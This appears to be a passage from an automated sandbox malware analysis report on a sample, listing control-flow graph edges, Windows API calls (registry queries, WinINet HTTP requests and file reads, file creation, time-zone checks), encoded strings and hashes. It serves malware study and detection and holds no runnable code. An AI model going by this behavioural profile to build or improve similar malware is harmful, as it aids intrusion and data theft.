cc2870 2887->2893 2889->2744 2889->2890 2890->2884 2892->2744 2892->2893 2893->2886 2902 cbe02b-cbe032 call cc2870 2894->2902 2903 cbe017-cbe025 2894->2903 2897 cbe07b-cbe093 2895->2897 2898 cbe04f-cbe05b 2895->2898 2908 cbe0c1-cbe0d9 2897->2908 2909 cbe095-cbe0a1 2897->2909 2904 cbe05d-cbe06b 2898->2904 2905 cbe071-cbe078 call cc2870 2898->2905 2902->2895 2903->2744 2903->2902 2904->2744 2904->2905 2905->2897 2906->2819 2962 cbdd52-cbdd70 2907->2962 2916 cbe0db-cbe0e7 2908->2916 2917 cbe107-cbe11f 2908->2917 2914 cbe0a3-cbe0b1 2909->2914 2915 cbe0b7-cbe0be call cc2870 2909->2915 2914->2744 2914->2915 2915->2908 2924 cbe0e9-cbe0f7 2916->2924 2925 cbe0fd-cbe104 call cc2870 2916->2925 2919 cbe14d-cbe168 2917->2919 2920 cbe121-cbe12d 2917->2920 2929 cbe16a-cbe179 2919->2929 2930 cbe199-cbe1bd 2919->2930 2926 cbe12f-cbe13d 2920->2926 2927 cbe143-cbe14a call cc2870 2920->2927 2924->2744 2924->2925 2925->2917 2926->2744 2926->2927 2927->2919 2936 cbe17b-cbe189 2929->2936 2937 cbe18f-cbe196 call cc2870 2929->2937 2938 cbe1bf-cbe1ce 2930->2938 2939 cbe1ee-cbe212 2930->2939 2936->2744 2936->2937 2937->2930 2945 cbe1d0-cbe1de 2938->2945 2946 cbe1e4-cbe1eb call cc2870 2938->2946 2940 cbe23f-cbe245 2939->2940 2941 cbe214-cbe223 2939->2941 2948 cbe235-cbe23c call cc2870 2941->2948 2949 cbe225-cbe233 2941->2949 2945->2744 2945->2946 2946->2939 2948->2940 2949->2744 2949->2948 2962->2882 2963 cbdd76-cbdd79 2962->2963 2963->2882 2964 cbdd7f-cbddb9 call cc1350 call cb2b70 call cc18f0 2963->2964 2971 cbddbb-cbddc6 2964->2971 2972 cbddda-cbddef call cc1d80 2964->2972 2973 cbddca-cbddd8 2971->2973 2974 cbddc8 2971->2974 2976 cbddf1-cbde67 call cc18f0 call cc1350 call cb4a60 call cc1350 call cb2b70 call cb2db0 2972->2976 2973->2976 2974->2973 2990 cbde69-cbde75 2976->2990 2991 cbde95-cbdead 2976->2991 2994 cbde8b-cbde92 call cc2870 2990->2994 2995 cbde77-cbde85 2990->2995 2992 cbdedb-cbdef3 2991->2992 2993 cbdeaf-cbdebb 2991->2993 2992->2882 2998 cbdef9-cbdf05 2992->2998 2996 cbdebd-cbdecb 2993->2996 2997 cbded1-cbded8 call cc2870 2993->2997 2994->2991 2995->2736 2995->2994 2996->2736 2996->2997 2997->2992 3001 cbdf1b-cbdf25 call cc2870 2998->3001 3002 cbdf07-cbdf15 2998->3002 3001->2882 3002->2736 3002->3001
                                                                                                APIs
                                                                                                • GetTempPathA.KERNEL32(00000104,?), ref: 00CBDA41
                                                                                                  • Part of subcall function 00CB5140: SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00CB515B
                                                                                                  • Part of subcall function 00CB2B70: RegOpenKeyExA.KERNELBASE(?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CC1
                                                                                                  • Part of subcall function 00CB2B70: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400,?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CE9
                                                                                                  • Part of subcall function 00CB2B70: RegCloseKey.KERNELBASE(?,?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CF2
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 00CBE25A
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 00CBE27D
                                                                                                  • Part of subcall function 00CC1350: Concurrency::cancel_current_task.LIBCPMT ref: 00CC1404
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: PathXinvalid_argumentstd::_$CloseConcurrency::cancel_current_taskFolderOpenQueryTempValue
                                                                                                • String ID: 2dLxXGolRoEl$853321935212$D e9$OJq=$OJu=$Otu=$invalid stoi argument$stoi argument out of range
                                                                                                • API String ID: 231225927-2205316878
                                                                                                • Opcode ID: a5e9cfc8f1d108a8d2870093d4a876433ef802329418b7be7e96fa8f5a1b5d0d
                                                                                                • Instruction ID: d9e7fd92a0cd99b8cb6ac99aa8ac6c7c0d2a03f67b38269c738a955f581026bd
                                                                                                • Opcode Fuzzy Hash: a5e9cfc8f1d108a8d2870093d4a876433ef802329418b7be7e96fa8f5a1b5d0d
                                                                                                • Instruction Fuzzy Hash: F6620471A001449BDF08EF78CC86BED7B66AF86344F58421CF806972D7EB35DA858792
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 3007 cbe7a0-cbe7b1 3008 cbe7b7-cbe809 call cc16c0 3007->3008 3009 cbf215-cbf21b 3007->3009 3021 cbf2d8 call cc17f0 3008->3021 3022 cbe80f-cbe857 call cc16c0 3008->3022 3011 cbf249-cbf261 3009->3011 3012 cbf21d-cbf229 3009->3012 3013 cbf28f-cbf2a7 3011->3013 3014 cbf263-cbf26f 3011->3014 3016 cbf22b-cbf239 3012->3016 3017 cbf23f-cbf246 call cc2870 3012->3017 3023 cbf2a9-cbf2b5 3013->3023 3024 cbf2d1-cbf2d7 3013->3024 3019 cbf271-cbf27f 3014->3019 3020 cbf285-cbf28c call cc2870 3014->3020 3016->3017 3025 cbf30a-cbf30f call cc6fe4 3016->3025 3017->3011 3019->3020 3019->3025 3020->3013 3033 cbf2dd call cc6fe4 3021->3033 3022->3021 3039 cbe85d-cbe89a call cc16c0 3022->3039 3031 cbf2c7-cbf2ce call cc2870 3023->3031 3032 cbf2b7-cbf2c5 3023->3032 3031->3024 3032->3025 3032->3031 3041 cbf2e2 call cc6fe4 3033->3041 3039->3021 3046 cbe8a0-cbe8e0 call cc16c0 call cc1350 call cb2b70 3039->3046 3045 cbf2e7 call cc6fe4 3041->3045 3049 cbf2ec call cc6fe4 3045->3049 3059 cbe8e2 3046->3059 3060 cbe8e4-cbe91d call cc1ca0 3046->3060 3054 cbf2f1-cbf2f6 call cc23aa 3049->3054 3058 cbf2fb call cc6fe4 3054->3058 3063 cbf300-cbf305 call cc23ea 3058->3063 3059->3060 3060->3021 3066 cbe923-cbe947 call cc16c0 3060->3066 3063->3025 3069 cbe949-cbe955 3066->3069 3070 cbe975-cbe995 call cc1350 call cb2b70 3066->3070 3072 cbe96b-cbe972 call cc2870 3069->3072 3073 cbe957-cbe965 3069->3073 3079 cbe999-cbe9af 3070->3079 3080 cbe997 3070->3080 3072->3070 3073->3033 3073->3072 3081 cbea03 3079->3081 3082 cbe9b1-cbe9ce call cc35b0 3079->3082 3080->3079 3083 cbea06-cbea0c 3081->3083 3092 cbe9e0-cbe9e7 3082->3092 3093 cbe9d0-cbe9de 3082->3093 3085 cbea0e-cbea1a 3083->3085 3086 cbea40-cbea43 3083->3086 3088 cbea1c-cbea2a 3085->3088 3089 cbea36-cbea3d call cc2870 3085->3089 3090 cbea49-cbeaa8 call cc16c0 call cc1350 call cb2b70 call cc1c30 3086->3090 3091 cbed56-cbed5c 3086->3091 3088->3041 3096 cbea30 3088->3096 3089->3086 3139 cbeaaa-cbeab6 3090->3139 3140 cbead6-cbeadc 3090->3140 3094 cbed8a-cbed90 3091->3094 3095 cbed5e-cbed6a 3091->3095 3092->3081 3099 cbe9e9 3092->3099 3093->3092 3093->3093 3102 cbedbe-cbedc4 3094->3102 3103 cbed92-cbed9e 3094->3103 3100 cbed6c-cbed7a 3095->3100 3101 cbed80-cbed87 call cc2870 3095->3101 3096->3089 3106 cbe9f0-cbe9fc 3099->3106 3100->3058 3100->3101 3101->3094 3111 cbedc6-cbedd5 3102->3111 3112 cbedf5-cbee16 3102->3112 3108 cbeda0-cbedae 3103->3108 3109 cbedb4-cbedbb call cc2870 3103->3109 3113 cbe9fe-cbea01 3106->3113 3114 cbea32-cbea34 3106->3114 3108->3058 3108->3109 3109->3102 3120 cbedeb-cbedf2 call cc2870 3111->3120 3121 cbedd7-cbede5 3111->3121 3115 cbee18-cbee27 3112->3115 3116 cbee47-cbee4d 3112->3116 3113->3081 3113->3106 3114->3083 3123 cbee29-cbee37 3115->3123 3124 cbee3d-cbee44 call cc2870 3115->3124 3116->3009 3125 cbee53-cbee5f 3116->3125 3120->3112 3121->3058 3121->3120 3123->3058 3123->3124 3124->3116 3130 cbf20b-cbf212 call cc2870 3125->3130 3131 cbee65-cbee73 3125->3131 3130->3009 3131->3058 3136 cbee79 3131->3136 3136->3130 3141 cbeab8-cbeac6 3139->3141 3142 cbeacc-cbead3 call cc2870 3139->3142 3143 cbeb0a-cbeb0c 3140->3143 3144 cbeade-cbeaea 3140->3144 3141->3045 3141->3142 3142->3140 3148 cbec49-cbec79 call cc5900 call cc6dc0 3143->3148 3149 cbeb12-cbeb2a 3143->3149 3146 cbeaec-cbeafa 3144->3146 3147 cbeb00-cbeb07 call cc2870 3144->3147 3146->3045 3146->3147 3147->3143 3148->3054 3162 cbec7f-cbec82 3148->3162 3149->3021 3153 cbeb30-cbeb82 call cc16c0 call cb27e0 call cc11b0 3149->3153 3167 cbebb0-cbebb6 3153->3167 3168 cbeb84-cbeb90 3153->3168 3162->3063 3164 cbec88-cbec8b 3162->3164 3164->3091 3166 cbec91 3164->3166 3169 cbec98-cbec9f 3166->3169 3170 cbef88-cbefc0 call cc1350 * 4 call cbe2b0 3166->3170 3171 cbee7e-cbee85 3166->3171 3172 cbf06e-cbf07a 3166->3172 3173 cbefcd-cbf047 call cc1350 call cb2b70 call cc1350 * 6 call cbd150 3166->3173 3174 cbf05d-cbf069 3166->3174 3175 cbf04c-cbf058 3166->3175 3176 cbef30-cbef37 3166->3176 3184 cbebb8-cbebc4 3167->3184 3185 cbebe4-cbec1b call cc1350 * 2 call cb2690 call cc11b0 3167->3185 3179 cbeb92-cbeba0 3168->3179 3180 cbeba6-cbebad call cc2870 3168->3180 3181 cbeca4-cbece6 call cc16c0 * 2 3169->3181 3237 cbefc5-cbefc8 3170->3237 3182 cbee8a-cbef20 call cc16c0 * 2 call cc1350 call cb2b70 call cc1350 * 5 call cbd730 3171->3182 3177 cbef3c-cbef83 call cc16c0 * 2 3172->3177 3173->3091 3174->3182 3175->3181 3176->3177 3218 cbeceb-cbed50 call cc1350 call cb2b70 call cc1350 * 6 call cbc8e0 3177->3218 3179->3058 3179->3180 3180->3167 3181->3218 3273 cbef25-cbef2b 3182->3273 3192 cbebda-cbebe1 call cc2870 3184->3192 3193 cbebc6-cbebd4 3184->3193 3185->3148 3239 cbec1d-cbec29 3185->3239 3192->3185 3193->3058 3193->3192 3218->3091 3237->3091 3243 cbec2b-cbec39 3239->3243 3244 cbec3f-cbec46 call cc2870 3239->3244 3243->3049 3243->3244 3244->3148 3273->3091
                                                                                                APIs
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 00CBF2F6
                                                                                                  • Part of subcall function 00CC16C0: Concurrency::cancel_current_task.LIBCPMT ref: 00CC17E1
                                                                                                  • Part of subcall function 00CB2B70: RegOpenKeyExA.KERNELBASE(?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CC1
                                                                                                  • Part of subcall function 00CB2B70: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400,?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CE9
                                                                                                  • Part of subcall function 00CB2B70: RegCloseKey.KERNELBASE(?,?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CF2
                                                                                                  • Part of subcall function 00CC1350: Concurrency::cancel_current_task.LIBCPMT ref: 00CC1404
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Concurrency::cancel_current_task$CloseOpenQueryValueXinvalid_argumentstd::_
                                                                                                • String ID: 2xCA$5120$NSRn$ON8o$Ownv$invalid stoi argument$stoi argument out of range$xm==$zoiu
                                                                                                • API String ID: 886804495-1634061489
                                                                                                • Opcode ID: abcd60b4f240f0b58cc26e01e66d37aa94ab873063001f12f41f648ae671355d
                                                                                                • Instruction ID: 2df530b1964622052cfd16a4d9d9f79a788de6c3aecf80dcbf6c58f022490fcd
                                                                                                • Opcode Fuzzy Hash: abcd60b4f240f0b58cc26e01e66d37aa94ab873063001f12f41f648ae671355d
                                                                                                • Instruction Fuzzy Hash: 6A420571A00104ABDF08EF79CC86BED7B79AB42744F54466CF811972D3DB35CA868B92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 3278 cb73eb-cb73ef 3279 cb782c-cb7891 call cc16c0 3278->3279 3280 cb73f5-cb73f9 3278->3280 3287 cb78be-cb78c5 call cc2870 3279->3287 3288 cb77e3-cb77fb 3279->3288 3280->3279 3282 cb73ff-cb7474 InternetOpenW InternetConnectA call cc1350 call cb2b70 3280->3282 3296 cb7478-cb7494 HttpOpenRequestA 3282->3296 3297 cb7476 3282->3297 3290 cb78c8-cb78d0 3287->3290 3288->3290 3291 cb7801-cb780d 3288->3291 3291->3287 3294 cb7813-cb7821 3291->3294 3294->3279 3298 cb78db-cb78e0 call cc6fe4 3294->3298 3299 cb74c2-cb74ff call cc1350 call cb2b70 3296->3299 3300 cb7496-cb74a2 3296->3300 3297->3296 3314 cb7503-cb7536 call cc1350 call cb2b70 HttpSendRequestA 3299->3314 3315 cb7501 3299->3315 3303 cb74b8-cb74bf call cc2870 3300->3303 3304 cb74a4-cb74b2 3300->3304 3303->3299 3304->3303 3307 cb78d1 call cc6fe4 3304->3307 3313 cb78d6 3307->3313 3313->3298 3316 cb78d6 call cc6fe4 3313->3316 3321 cb7538-cb7544 3314->3321 3322 cb7564-cb757c 3314->3322 3315->3314 3316->3298 3325 cb755a-cb7561 call cc2870 3321->3325 3326 cb7546-cb7554 3321->3326 3323 cb75aa-cb75c3 InternetReadFile 3322->3323 3324 cb757e-cb758a 3322->3324 3329 cb75c9 3323->3329 3330 cb7733-cb776f InternetCloseHandle * 3 3323->3330 3327 cb758c-cb759a 3324->3327 3328 cb75a0-cb75a7 call cc2870 3324->3328 3325->3322 3326->3313 3326->3325 3327->3313 3327->3328 3328->3323 3336 cb75d0-cb75d4 3329->3336 3334 cb779d-cb77b5 3330->3334 3335 cb7771-cb777d 3330->3335 3334->3288 3342 cb77b7-cb77c3 3334->3342 3338 cb777f-cb778d 3335->3338 3339 cb7793-cb779a call cc2870 3335->3339 3340 cb75da-cb75f1 3336->3340 3341 cb7730 3336->3341 3338->3298 3338->3339 3339->3334 3344 cb75f5-cb75fa 3340->3344 3341->3330 3345 cb77d9-cb77e0 call cc2870 3342->3345 3346 cb77c5-cb77d3 3342->3346 3344->3344 3348 cb75fc-cb765e call cc16c0 * 2 3344->3348 3345->3288 3346->3298 3346->3345 3355 cb768c-cb769c call cc1d80 3348->3355 3356 cb7660-cb768a call cc4380 3348->3356 3361 cb769f-cb76a5 3355->3361 3356->3361 3362 cb76d2-cb76d8 3361->3362 3363 cb76a7-cb76b2 3361->3363 3366 cb76da-cb76e6 3362->3366 3367 cb7706-cb772a InternetReadFile 3362->3367 3364 cb76c8-cb76cf call cc2870 3363->3364 3365 cb76b4-cb76c2 3363->3365 3364->3362 3365->3307 3365->3364 3369 cb76e8-cb76f6 3366->3369 3370 cb76fc-cb7703 call cc2870 3366->3370 3367->3336 3367->3341 3369->3307 3369->3370 3370->3367
                                                                                                APIs
                                                                                                • InternetOpenW.WININET(00CE0A64,00000000,00000000,00000000,00000000), ref: 00CB741E
                                                                                                • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00CB7440
                                                                                                • HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 00CB7485
                                                                                                • HttpSendRequestA.WININET(?,00000000,?), ref: 00CB752A
                                                                                                • InternetReadFile.WININET(?,?,000003FF,?), ref: 00CB75BB
                                                                                                • InternetReadFile.WININET(?,00000000,000003FF,00000000), ref: 00CB7722
                                                                                                • InternetCloseHandle.WININET(?), ref: 00CB773A
                                                                                                • InternetCloseHandle.WININET(?), ref: 00CB773F
                                                                                                • InternetCloseHandle.WININET(?), ref: 00CB7744
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
                                                                                                • String ID: JuZWTA==
                                                                                                • API String ID: 1354133546-1136573735
                                                                                                • Opcode ID: c4f18f1d0e12d2acddff721b1fbc8fc0c62a4dc27173b32087ad8aaddd2e2789
                                                                                                • Instruction ID: fad6cea276cbc58f1091ddf51ab2706c2bbd9df1ae7394eb51915f9088385eef
                                                                                                • Opcode Fuzzy Hash: c4f18f1d0e12d2acddff721b1fbc8fc0c62a4dc27173b32087ad8aaddd2e2789
                                                                                                • Instruction Fuzzy Hash: E7E1C131A001089BEF19CF68CD89BDDBB75AF85304F64825CF815BB2D2DB759A85CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 3374 cce6c0-cce6f0 call cce40e 3377 cce70b-cce717 call cca27a 3374->3377 3378 cce6f2-cce6fd call cc58ed 3374->3378 3384 cce719-cce72e call cc58ed call cc5900 3377->3384 3385 cce730-cce779 call cce379 3377->3385 3383 cce6ff-cce706 call cc5900 3378->3383 3394 cce9e5-cce9e9 3383->3394 3384->3383 3392 cce77b-cce784 3385->3392 3393 cce7e6-cce7ef GetFileType 3385->3393 3396 cce7bb-cce7e1 GetLastError call cc58ca 3392->3396 3397 cce786-cce78a 3392->3397 3398 cce838-cce83b 3393->3398 3399 cce7f1-cce822 GetLastError call cc58ca CloseHandle 3393->3399 3396->3383 3397->3396 3403 cce78c-cce7b9 call cce379 3397->3403 3401 cce83d-cce842 3398->3401 3402 cce844-cce84a 3398->3402 3399->3383 3413 cce828-cce833 call cc5900 3399->3413 3406 cce84e-cce89c call cca1c5 3401->3406 3402->3406 3407 cce84c 3402->3407 3403->3393 3403->3396 3416 cce89e-cce8aa call cce588 3406->3416 3417 cce8bb-cce8e3 call cce126 3406->3417 3407->3406 3413->3383 3416->3417 3425 cce8ac 3416->3425 3423 cce8e8-cce929 3417->3423 3424 cce8e5-cce8e6 3417->3424 3427 cce94a-cce958 3423->3427 3428 cce92b-cce92f 3423->3428 3426 cce8ae-cce8b6 call cc8aa4 3424->3426 3425->3426 3426->3394 3430 cce95e-cce962 3427->3430 3431 cce9e3 3427->3431 3428->3427 3429 cce931-cce945 3428->3429 3429->3427 3430->3431 3433 cce964-cce997 CloseHandle call cce379 3430->3433 3431->3394 3437 cce999-cce9c5 GetLastError call cc58ca call cca38d 3433->3437 3438 cce9cb-cce9df 3433->3438 3437->3438 3438->3431
                                                                                                APIs
                                                                                                  • Part of subcall function 00CCE379: CreateFileW.KERNELBASE(00000000,00000000,?,00CCE769,?,?,00000000,?,00CCE769,00000000,0000000C), ref: 00CCE396
                                                                                                • GetLastError.KERNEL32 ref: 00CCE7D4
                                                                                                • __dosmaperr.LIBCMT ref: 00CCE7DB
                                                                                                • GetFileType.KERNELBASE(00000000), ref: 00CCE7E7
                                                                                                • GetLastError.KERNEL32 ref: 00CCE7F1
                                                                                                • __dosmaperr.LIBCMT ref: 00CCE7FA
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00CCE81A
                                                                                                • CloseHandle.KERNEL32(00CC87EE), ref: 00CCE967
                                                                                                • GetLastError.KERNEL32 ref: 00CCE999
                                                                                                • __dosmaperr.LIBCMT ref: 00CCE9A0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                • String ID: H
                                                                                                • API String ID: 4237864984-2852464175
                                                                                                • Opcode ID: 45380194fe828c4b1599cf6aebccbf8ccdf188ae35b46e6c1083fc711c0ceba0
                                                                                                • Instruction ID: 40853db1ac23a7b6485b861393f4532e65754350f899ad157d71ea9d4965f16c
                                                                                                • Opcode Fuzzy Hash: 45380194fe828c4b1599cf6aebccbf8ccdf188ae35b46e6c1083fc711c0ceba0
                                                                                                • Instruction Fuzzy Hash: 38A10432A041589FCF19AF68DC92FAE3BA1AB07320F18015DF811AF3E2D7359952DB51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 3797 ccfe62-ccfe8a call ccf8a3 call ccf901 3802 ccfe90-ccfe9c call ccf8a9 3797->3802 3803 ccffb2-cd000f call cc7001 call cd35cb 3797->3803 3802->3803 3808 ccfea2-ccfeae call ccf8d5 3802->3808 3815 cd0019-cd001c 3803->3815 3816 cd0011-cd0017 3803->3816 3808->3803 3814 ccfeb4-ccfed5 call cc8951 GetTimeZoneInformation 3808->3814 3824 ccfedb-ccfefc 3814->3824 3825 ccff90-ccffb1 call ccf89d call ccf891 call ccf897 3814->3825 3818 cd005f-cd0071 3815->3818 3819 cd001e-cd002e call cc8e3a 3815->3819 3816->3818 3822 cd0081 3818->3822 3823 cd0073-cd0076 3818->3823 3833 cd0038-cd0051 call cd35cb 3819->3833 3834 cd0030 3819->3834 3827 cd0086-cd009b call cc8951 call cc308c 3822->3827 3828 cd0081 call ccfe62 3822->3828 3823->3822 3829 cd0078-cd007f call ccfc87 3823->3829 3831 ccfefe-ccff03 3824->3831 3832 ccff06-ccff0d 3824->3832 3828->3827 3829->3827 3831->3832 3842 ccff1f-ccff21 3832->3842 3843 ccff0f-ccff16 3832->3843 3851 cd0056-cd005c call cc8951 3833->3851 3852 cd0053-cd0054 3833->3852 3841 cd0031-cd0036 call cc8951 3834->3841 3859 cd005e 3841->3859 3844 ccff23-ccff4c call ccd1ac call ccc8a4 3842->3844 3843->3842 3849 ccff18-ccff1d 3843->3849 3864 ccff4e-ccff51 3844->3864 3865 ccff5a-ccff5c 3844->3865 3849->3844 3851->3859 3852->3841 3859->3818 3864->3865 3866 ccff53-ccff58 3864->3866 3867 ccff5e-ccff7c call ccc8a4 3865->3867 3866->3867 3870 ccff7e-ccff81 3867->3870 3871 ccff8b-ccff8e 3867->3871 3870->3871 3872 ccff83-ccff89 3870->3872 3871->3825 3872->3825
                                                                                                APIs
                                                                                                • GetTimeZoneInformation.KERNELBASE(?,00000000,00000000,00000000,?,00CDE710), ref: 00CCFECC
                                                                                                • _free.LIBCMT ref: 00CCFEBA
                                                                                                  • Part of subcall function 00CC8951: HeapFree.KERNEL32(00000000,00000000,?,00CCD362,00000000,00000000,00000000,E800CE41,?,00CCD389,00000000,00000007,00000000,?,00CCD78B,00000000), ref: 00CC8967
                                                                                                  • Part of subcall function 00CC8951: GetLastError.KERNEL32(00000000,?,00CCD362,00000000,00000000,00000000,E800CE41,?,00CCD389,00000000,00000007,00000000,?,00CCD78B,00000000,00000000), ref: 00CC8979
                                                                                                • _free.LIBCMT ref: 00CD0087
                                                                                                Strings
                                                                                                • W. Europe Daylight Time, xrefs: 00CCFF6A
                                                                                                • W. Europe Standard Time, xrefs: 00CCFF3B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                                                                                                • String ID: W. Europe Daylight Time$W. Europe Standard Time
                                                                                                • API String ID: 2155170405-986674615
                                                                                                • Opcode ID: ec1962051b9bc8b70528142cd7c74cfb153ea6137c0cf6e828fc7baa9ebb5b2e
                                                                                                • Instruction ID: c1cebc4fc04c3d8fa59de1940ba24abd8d7aca69fff44fecf9a14d611ded4ac7
                                                                                                • Opcode Fuzzy Hash: ec1962051b9bc8b70528142cd7c74cfb153ea6137c0cf6e828fc7baa9ebb5b2e
                                                                                                • Instruction Fuzzy Hash: FC51E672900249AFDB10EFA9DC81FAEB7B9EF46314F10067EE52197291E7709F429B50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
